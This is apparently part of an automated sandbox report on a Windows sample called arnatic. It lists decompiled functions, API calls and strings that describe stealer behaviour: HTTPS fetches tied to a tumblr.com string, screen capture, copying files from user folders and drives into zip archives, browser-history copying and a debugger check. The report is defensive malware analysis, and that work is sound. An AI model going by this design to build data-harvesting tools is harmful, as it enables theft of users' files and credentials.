Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 0a0f17ba5c333434c9e1fb2208008516e048abdd44fae31c7cf24530ff6e4f0c
Instruction ID: b03839ed1530637916be8956147914235fa4bb4de1e80b8c14d9d4ec074ed16b
Opcode Fuzzy Hash: 0a0f17ba5c333434c9e1fb2208008516e048abdd44fae31c7cf24530ff6e4f0c
Instruction Fuzzy Hash: B7113A71200201DFD720DF29EE959267BBAFB857247108B3AF255E71F1C771A845DB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040402C, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040402C(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x40924c);
				InitializeCriticalSection( *0x40923c);
				InitializeCriticalSection( *0x40922c);
				InitializeCriticalSection( *0x40920c);
				return _t1;
			}

0x0040402c
0x00404039
0x00404041
0x00404049
0x00404051
0x00404054

APIs

InitializeCriticalSection.KERNEL32(?,004031E2,?,004025D4), ref: 00404039
InitializeCriticalSection.KERNEL32(?,004031E2,?,004025D4), ref: 00404041
InitializeCriticalSection.KERNEL32(?,004031E2,?,004025D4), ref: 00404049
InitializeCriticalSection.KERNEL32(?,004031E2,?,004025D4), ref: 00404051

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 1f097fb3eb4cfca734cecc483b76f0d440ba2d0193dee8bd4de7588464d0d4d0
Instruction ID: 00f966c3af9eb70c05e3d7a916d958da934661165ed01b983a7363f8fbb1e15e
Opcode Fuzzy Hash: 1f097fb3eb4cfca734cecc483b76f0d440ba2d0193dee8bd4de7588464d0d4d0
Instruction Fuzzy Hash: 1EC00231807034BACF12AB65FE048893F65EB4426071189F6E5447103287311C54DFC9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: arnatic_3.exe PID: 6564 Parent PID: 5868 arnatic_3.exeCOMMON

Executed Functions

Function 0040B048, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 116
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 0040B052
DeleteUrlCacheEntry.WININET(?), ref: 0040B082
DeleteUrlCacheEntry.WININET(00000000), ref: 0040B0A4
InternetOpenA.WININET(004866C4,00000000,00000000,00000000,00000000), ref: 0040B0BD
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,04800000,00000000), ref: 0040B0F4
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,04800000,00000000), ref: 0040B118
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040B129
InternetReadFile.WININET(00000000,?,000007FF,?), ref: 0040B147
InternetCloseHandle.WININET(00000000), ref: 0040B15B
InternetCloseHandle.WININET(00000000), ref: 0040B162
InternetCloseHandle.WININET(?), ref: 0040B16E

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

GET, xrefs: 0040B112

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$CacheDeleteEntryHttpOpenRequest$ConnectFileH_prolog3_ReadSend_memmove
String ID: GET
API String ID: 893606432-1805413626
Opcode ID: 5855ee48c5afdcf5212f447b14aaa2a03ae6390c45765a8daf0d9ed13d68d640
Instruction ID: c23d1bb0e2a840021510766270b0519a58abec4e422cb0a9772e751bcbae7055
Opcode Fuzzy Hash: 5855ee48c5afdcf5212f447b14aaa2a03ae6390c45765a8daf0d9ed13d68d640
Instruction Fuzzy Hash: DC4139B1500218AFEB10EF65CC94AAE77ACFF54354F0485BAF805A7190DB749E84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0045F39E, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0045F3D3

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 39045fa03170bf407b01ce1c934777c4b3ce8c91c58183a3e13e1965d5186b78
Instruction ID: 1a92cd8a6fab1274d74695625d4ec5dddc869f60e39b159551d5985f55c692cd
Opcode Fuzzy Hash: 39045fa03170bf407b01ce1c934777c4b3ce8c91c58183a3e13e1965d5186b78
Instruction Fuzzy Hash: 39F0FF715102188BDB30DFA8DC45BDDB7F8BB04309F10852ED459E7281DFB866488BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004626D0, Relevance: 52.7, APIs: 10, Strings: 20, Instructions: 242
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 004626DE
GetProcAddress.KERNEL32(00000000), ref: 004626F7
GetProcAddress.KERNEL32(00000000), ref: 00462705
LoadLibraryA.KERNEL32(00000000), ref: 00462713
LoadLibraryA.KERNEL32 ref: 00462721
LoadLibraryA.KERNEL32 ref: 00462730
LoadLibraryA.KERNEL32 ref: 0046273E
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0046274B
LoadLibraryA.KERNEL32(ole32.dll), ref: 00462759
LoadLibraryA.KERNEL32(user32.dll), ref: 00462767

Strings

ReleaseDC, xrefs: 00462A4C
ole32.dll, xrefs: 00462751
GetDesktopWindow, xrefs: 00462A3B
CoUninitialize, xrefs: 00462A19
gdi32.dll, xrefs: 00462744
GetSystemMetrics, xrefs: 00462AB2
wsprintfA, xrefs: 00462A90
CoCreateInstance, xrefs: 00462A0B
CreateDCA, xrefs: 004629CD
EnumDisplayDevicesA, xrefs: 00462AA1
GetDC, xrefs: 00462A7F
CreateCompatibleDC, xrefs: 004629EF
DeleteObject, xrefs: 004629BC
BitBlt, xrefs: 004629AB
user32.dll, xrefs: 0046275F
CharToOemA, xrefs: 00462A6E
SelectObject, xrefs: 0046299A
CreateCompatibleBitmap, xrefs: 0046298E
GetKeyboardLayoutList, xrefs: 00462A5D
GetDeviceCaps, xrefs: 004629DE

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressProc
String ID: BitBlt$CharToOemA$CoCreateInstance$CoUninitialize$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCA$DeleteObject$EnumDisplayDevicesA$GetDC$GetDesktopWindow$GetDeviceCaps$GetKeyboardLayoutList$GetSystemMetrics$ReleaseDC$SelectObject$gdi32.dll$ole32.dll$user32.dll$wsprintfA
API String ID: 1469910268-2379150429
Opcode ID: 780ba64517c8d2eca81f81ddb81981c8b28670a19187df27068c402a8f78e781
Instruction ID: b928e6f6646008cc2345387d8eca292eccb3f2ec135819ce51ea03abba41f428
Opcode Fuzzy Hash: 780ba64517c8d2eca81f81ddb81981c8b28670a19187df27068c402a8f78e781
Instruction Fuzzy Hash: 54A15B75801211EFDB019FE6AE889693EB9FB3970171004BBF90292271EBB94412DF5F

Uniqueness

Uniqueness Score: -1.00%

Function 00467CB1, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 00467CCB

Part of subcall function 0046948E: __FF_MSGBANNER.LIBCMT ref: 004694A7
Part of subcall function 0046948E: __NMSG_WRITE.LIBCMT ref: 004694AE
Part of subcall function 0046948E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 004694D3

std::exception::exception.LIBCMT ref: 00467D00
std::exception::exception.LIBCMT ref: 00467D1A
__CxxThrowException@8.LIBCMT ref: 00467D2B

Strings

8-@, xrefs: 00467CE3
bad allocation, xrefs: 00467CF9

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: 8-@$bad allocation
API String ID: 615853336-3215286821
Opcode ID: 8bb720bc5296989b06c4e50507f59781e1e4d8ccf3d83f80ecad6f1c4b5e65e0
Instruction ID: b6571c467b07ad3a869de441727c3a134040367854014555fea3d002550a35aa
Opcode Fuzzy Hash: 8bb720bc5296989b06c4e50507f59781e1e4d8ccf3d83f80ecad6f1c4b5e65e0
Instruction Fuzzy Hash: 56F0D671508609A6DF10EB56D941A6E3AA86B4136CF50082FF400A25E2FBBD9A01875F

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1B2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 0040B1B9

Part of subcall function 0040B048: __EH_prolog3_GS.LIBCMT ref: 0040B052
Part of subcall function 0040B048: DeleteUrlCacheEntry.WININET(?), ref: 0040B082
Part of subcall function 0040B048: DeleteUrlCacheEntry.WININET(00000000), ref: 0040B0A4
Part of subcall function 0040B048: InternetOpenA.WININET(004866C4,00000000,00000000,00000000,00000000), ref: 0040B0BD
Part of subcall function 0040B048: InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,04800000,00000000), ref: 0040B0F4
Part of subcall function 0040B048: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,04800000,00000000), ref: 0040B118
Part of subcall function 0040B048: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040B129
Part of subcall function 0040B048: InternetReadFile.WININET(00000000,?,000007FF,?), ref: 0040B147
Part of subcall function 0040B048: InternetCloseHandle.WININET(00000000), ref: 0040B15B
Part of subcall function 0040B048: InternetCloseHandle.WININET(00000000), ref: 0040B162
Part of subcall function 0040B048: InternetCloseHandle.WININET(?), ref: 0040B16E

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 00402EA9: std::_Xinvalid_argument.LIBCPMT ref: 00402EBC
Part of subcall function 00402EA9: _memmove.LIBCMT ref: 00402EF7

_strtok.LIBCMT ref: 0040B285

Strings

.tumblr.com, xrefs: 0040B20A

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle_memmove$CacheDeleteEntryH_prolog3_HttpOpenRequest$ConnectFileReadSendXinvalid_argument_strtokstd::_
String ID: .tumblr.com
API String ID: 1242742592-2315445652
Opcode ID: 1b62877b125975b46edbb2fbd10222c63930bad7b5c3c5089f58e2c18eb30d4c
Instruction ID: e8bb4b70fbc5795f04bad314af0a6c4af42f6399e3faaca33278e9da457a5689
Opcode Fuzzy Hash: 1b62877b125975b46edbb2fbd10222c63930bad7b5c3c5089f58e2c18eb30d4c
Instruction Fuzzy Hash: 4E3195B1C01308AEDB05EBA9C956ADD7B78DF15308F10816EF515B71C2DB781A48C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00402D73, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::exception::exception.LIBCMT ref: 00402D9E
__CxxThrowException@8.LIBCMT ref: 00402DB3

Part of subcall function 00467CB1: _malloc.LIBCMT ref: 00467CCB

Strings

8-@, xrefs: 00402DAC

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 8-@
API String ID: 4063778783-2211411525
Opcode ID: d8687160cd240653a54a60a32f905a401fa52f8d9b16956b9ae254f8a0d3696e
Instruction ID: 1da3b7c75d6754088f883acc572510ab46b47019f5826d925436be5dcede2ebb
Opcode Fuzzy Hash: d8687160cd240653a54a60a32f905a401fa52f8d9b16956b9ae254f8a0d3696e
Instruction Fuzzy Hash: 70E03031800609AACF11AF65C9556CD3BA8AF00368F10853BB814A51C1E778C6448B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9EE, Relevance: 3.8, APIs: 3, Instructions: 23
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000214), ref: 0040C9FF
Sleep.KERNEL32(00000285), ref: 0040CA11
Sleep.KERNEL32(000001DC), ref: 0040CA23

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f6534a6415d60cb5095f9fad5d11c38104f23c49d5310d161ebf52d413f4bf0d
Instruction ID: 2132ad0a2a45480a011219c46c7676761be05386c2261e2d44dda6fb9f184d58
Opcode Fuzzy Hash: f6534a6415d60cb5095f9fad5d11c38104f23c49d5310d161ebf52d413f4bf0d
Instruction Fuzzy Hash: 3FE01A72B50248EFDB40EFA8A94D69D77B0EB05B02F1048B6E502F21C0D7708B05AB25

Uniqueness

Uniqueness Score: -1.00%

Function 004031A3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004031B2

Part of subcall function 0046647A: std::exception::exception.LIBCMT ref: 0046648F
Part of subcall function 0046647A: __CxxThrowException@8.LIBCMT ref: 004664A4
Part of subcall function 0046647A: std::exception::exception.LIBCMT ref: 004664B5

Strings

string too long, xrefs: 004031AD

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: string too long
API String ID: 1823113695-2556327735
Opcode ID: 3e8e9742b774440b82075c55cc48e56eace1b6e76e128a97eec6174f8c7e0d06
Instruction ID: 0ed9b95e3feb93e3ad6d089188e6ab8119e94eb207de0687309d98f0b9d8f16b
Opcode Fuzzy Hash: 3e8e9742b774440b82075c55cc48e56eace1b6e76e128a97eec6174f8c7e0d06
Instruction Fuzzy Hash: CDF0C8306042205EDB14BE284C4146A3E49AB5A319B214D7BF4A1FF1C2C77ACE82579E

Uniqueness

Uniqueness Score: -1.00%

Function 00402FD3, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 00402FDA
_memmove.LIBCMT ref: 00403070

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch_memmove
String ID:
API String ID: 3914490576-0
Opcode ID: aa165d25e5cb1bbd2326b0add1ec84d05733293981c824d5414b393de6eeb653
Instruction ID: eb61a42e5d185b1ae53b747685c3a58dfe355fedb7f6266dfd6a2ee3d4d8dc57
Opcode Fuzzy Hash: aa165d25e5cb1bbd2326b0add1ec84d05733293981c824d5414b393de6eeb653
Instruction Fuzzy Hash: 0C11E431B052019BDB24DF29C94176E7BA6AB85710F20462FE405AB2C5CBB5AF41879A

Uniqueness

Uniqueness Score: -1.00%

Function 004767B6, Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0046BFB8,00000000,?,00000000,00000000,00000000,?,0047024F,00000001,00000214), ref: 004767F9

Part of subcall function 0046DC0D: __getptd_noexit.LIBCMT ref: 0046DC0D

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 415f54c98ab47da51286429ca9ad902efc56fb4e92a6ff937c2e06ec1a48a3b4
Instruction ID: 1354c41c0aeae67e6a4e432769662dfd5fce292cfd3676fbff25651aa7474afa
Opcode Fuzzy Hash: 415f54c98ab47da51286429ca9ad902efc56fb4e92a6ff937c2e06ec1a48a3b4
Instruction Fuzzy Hash: E8012D31202A15DBEB28AF25DC14BDB3795AB51364F03C53BE81DD6290C738DC00C759

Uniqueness

Uniqueness Score: -1.00%

Function 00401016, Relevance: 1.3, APIs: 1, Instructions: 44
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00401025

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: a16e5b16714a1448422f66c129117e691444f1ff8e53e8e7b1cf012d2f1c0baa
Instruction ID: 5549ee678ecdc109923b726f2ef86f730a44a939511cc6300ebf448b160a6775
Opcode Fuzzy Hash: a16e5b16714a1448422f66c129117e691444f1ff8e53e8e7b1cf012d2f1c0baa
Instruction Fuzzy Hash: BB01A736304286ABCB01CF6DD8C49A6BFD9EF5A304B048065FD84CB312D571D908C7A4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A5EA, Relevance: 39.3, APIs: 8, Strings: 14, Instructions: 800COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0040A64E
_strtok.LIBCMT ref: 0040A710

Part of subcall function 00404E80: __EH_prolog3.LIBCMT ref: 00404E87

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

__wgetenv.LIBCMT ref: 0040A876
__wgetenv.LIBCMT ref: 0040A914
GetLogicalDriveStringsA.KERNEL32 ref: 0040AB55
_strtok.LIBCMT ref: 0040AB8A
GetDriveTypeA.KERNEL32(?,00000001,00000000,?,?,?,?,?), ref: 0040ABF0

Part of subcall function 0045F39E: GetUserNameA.ADVAPI32(?,?), ref: 0045F3D3

Part of subcall function 0046222E: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF3D,?,?,?), ref: 0046225D
Part of subcall function 0046222E: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF3D,?,?,?,?), ref: 0046228C

_strtok.LIBCMT ref: 0040AFC7

Strings

%C%, xrefs: 0040AE0B, 0040AE54
%DRIVE_REMOVABLE%, xrefs: 0040AD02, 0040AD39
%APPDATA%, xrefs: 0040A839, 0040A83E, 0040A865
.zip, xrefs: 0040AB92
C:\, xrefs: 0040AE32
APPDATA, xrefs: 0040A86D
%DESKTOP%, xrefs: 0040A975, 0040A97A, 0040A9A1
C:\Users\, xrefs: 0040A7A9, 0040A7B1, 0040A833, 0040A9BD, 0040AAA9
\Documents, xrefs: 0040AAB7
%DRIVE_FIXED%, xrefs: 0040ABF7, 0040AC30
LOCALAPPDATA, xrefs: 0040A90B
%LOCALAPPDATA%, xrefs: 0040A8D7, 0040A8DC, 0040A903
\Desktop, xrefs: 0040A9CB
%DOCUMENTS%, xrefs: 0040AA61, 0040AA66, 0040AA8D

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _strtok$ByteCharDriveMultiWide__wgetenv_memmove$H_prolog3LogicalNameStringsTypeUser
String ID: %APPDATA%$%C%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$.zip$APPDATA$C:\$C:\Users\$LOCALAPPDATA$\Desktop$\Documents
API String ID: 1597689408-2603015269
Opcode ID: 9de84f03eaa1c75717ab1114647f703aa1b742493e7db7ace4a126f6e3dd8ba3
Instruction ID: 6b2b76a7a1c2c27e836dfdb0f9c64e94787f64c98ac89f9fd48221a1eb9941d6
Opcode Fuzzy Hash: 9de84f03eaa1c75717ab1114647f703aa1b742493e7db7ace4a126f6e3dd8ba3
Instruction Fuzzy Hash: 4A62D871900248EEDB14EFA8C945BEE7BB8AF15308F14406EF905A71C2DB795B09C7A7

Uniqueness

Uniqueness Score: -1.00%

Function 00412F8E, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 193fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00412FAD

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

__wgetenv.LIBCMT ref: 00412FF3
_sprintf.LIBCMT ref: 0041302E
FindFirstFileA.KERNEL32(?,00000000,?,?,00000000), ref: 00413041
_sprintf.LIBCMT ref: 00413091

Part of subcall function 00468A4A: __output_l.LIBCMT ref: 00468AA5

_sprintf.LIBCMT ref: 004130BA

Part of subcall function 00468A4A: __flsbuf.LIBCMT ref: 00468AC0

_sprintf.LIBCMT ref: 004130C9
PathMatchSpecA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004130D8
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00413120
CopyFileA.KERNEL32(?,00000000,00000001), ref: 00413187
FindNextFileA.KERNEL32(?,00000000,?,?,00000000), ref: 004131CB
FindClose.KERNEL32(?,?,?,00000000), ref: 004131DC

Strings

%s\*, xrefs: 00413024
%s\%s, xrefs: 00413084, 0041308F, 004130C7

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _sprintf$FileFind$H_prolog3$CloseCopyCreateDirectoryFirstMatchNextPathSpec__flsbuf__output_l__wgetenv
String ID: %s\%s$%s\*
API String ID: 457607895-2848263008
Opcode ID: f7430de2c04be6b9252fb0ab319015f2a1e43f54279eb1cfd3627a616b1d19aa
Instruction ID: 3ff57846359ba13de4c694721eab0c34f60c1653bc4a869225215c91a0b2b59a
Opcode Fuzzy Hash: f7430de2c04be6b9252fb0ab319015f2a1e43f54279eb1cfd3627a616b1d19aa
Instruction Fuzzy Hash: 997173B1900248AFDF21EFA5CD45EDE77ACEF08305F00452AF909A7191DB799B44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A24D, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040A26C
_sprintf.LIBCMT ref: 0040A29D
FindFirstFileA.KERNEL32(?,00000000,?,?,00000014), ref: 0040A2B0
_sprintf.LIBCMT ref: 0040A300

Part of subcall function 00468A4A: __output_l.LIBCMT ref: 00468AA5

_sprintf.LIBCMT ref: 0040A329

Part of subcall function 00468A4A: __flsbuf.LIBCMT ref: 00468AC0

_sprintf.LIBCMT ref: 0040A338
PathMatchSpecA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 0040A347
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A3CB
FindNextFileA.KERNEL32(?,00000000,?,?,00000014), ref: 0040A42D
FindClose.KERNEL32(?,?,?,00000014), ref: 0040A43E

Strings

%s\*, xrefs: 0040A297
%s\%s, xrefs: 0040A2F3, 0040A2FE, 0040A336

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _sprintf$FileFind$CloseCopyFirstH_prolog3MatchNextPathSpec__flsbuf__output_l
String ID: %s\%s$%s\*
API String ID: 2813418133-2848263008
Opcode ID: 9f458dc93b36b1572e4da4393a4af3aff4f97ff279261bc1f32e6ff3b549c700
Instruction ID: 963dbf5e18f8c87d7d5599852a18e0a6d56faf2e50a60a81c7ce6a5966094dca
Opcode Fuzzy Hash: 9f458dc93b36b1572e4da4393a4af3aff4f97ff279261bc1f32e6ff3b549c700
Instruction Fuzzy Hash: 965131B1900249EFDF21EFA5CC45BDE7768FB08305F10453BFA09A6281EB7997148B59

Uniqueness

Uniqueness Score: -1.00%

Function 00412D8E, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 161fileCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 00412DE4
FindFirstFileA.KERNEL32(?,?), ref: 00412DF7
_sprintf.LIBCMT ref: 00412E48

Part of subcall function 00468A4A: __output_l.LIBCMT ref: 00468AA5

Part of subcall function 004125B7: __EH_prolog3.LIBCMT ref: 004125D6
Part of subcall function 004125B7: GetCurrentDirectoryA.KERNEL32(00000104,?,00000020), ref: 00412605
Part of subcall function 004125B7: lstrcatA.KERNEL32(?,\temp), ref: 00412614
Part of subcall function 004125B7: CopyFileA.KERNEL32(?,?,00000001), ref: 00412621

Part of subcall function 0040EE9E: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040EEDE
Part of subcall function 0040EE9E: lstrcatA.KERNEL32(?,\temp), ref: 0040EEF0
Part of subcall function 0040EE9E: CopyFileA.KERNEL32(?,?,00000001), ref: 0040EF00
Part of subcall function 0040EE9E: _memset.LIBCMT ref: 0040EF0E
Part of subcall function 0040EE9E: _sprintf.LIBCMT ref: 0040EF20
Part of subcall function 0040EE9E: DeleteFileA.KERNEL32(?), ref: 0040EFCA

Part of subcall function 0040EFE8: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F028
Part of subcall function 0040EFE8: lstrcatA.KERNEL32(?,\temp), ref: 0040F03A
Part of subcall function 0040EFE8: CopyFileA.KERNEL32(?,?,00000001), ref: 0040F04A
Part of subcall function 0040EFE8: _memset.LIBCMT ref: 0040F058
Part of subcall function 0040EFE8: _sprintf.LIBCMT ref: 0040F06A
Part of subcall function 0040EFE8: DeleteFileA.KERNEL32(?), ref: 0040F11A

FindNextFileA.KERNEL32(?,?), ref: 00412F5D
FindClose.KERNEL32(?), ref: 00412F6E

Strings

History, xrefs: 00412EB1
%s\*, xrefs: 00412DDB
%s\%s, xrefs: 00412E42

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: File$_sprintf$CopyCurrentDirectoryFindlstrcat$Delete_memset$CloseFirstH_prolog3Next__output_l
String ID: %s\%s$%s\*$History
API String ID: 1184990043-2206966733
Opcode ID: 6b3728142b36711f8108d8b72331e83f4dc245030b07dc280a584a7872a730d2
Instruction ID: 31ba0626d0a5f72ebef8bfbedfed4f557aaa13fe0eb7c8ae60c3c9eb8d6ca8e5
Opcode Fuzzy Hash: 6b3728142b36711f8108d8b72331e83f4dc245030b07dc280a584a7872a730d2
Instruction Fuzzy Hash: D2514772D0024EAECF24AFA1DD44ADE7BBDEB08304F20442BF508E7161EB359665DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00467018, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0046DD65
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0046DD7A
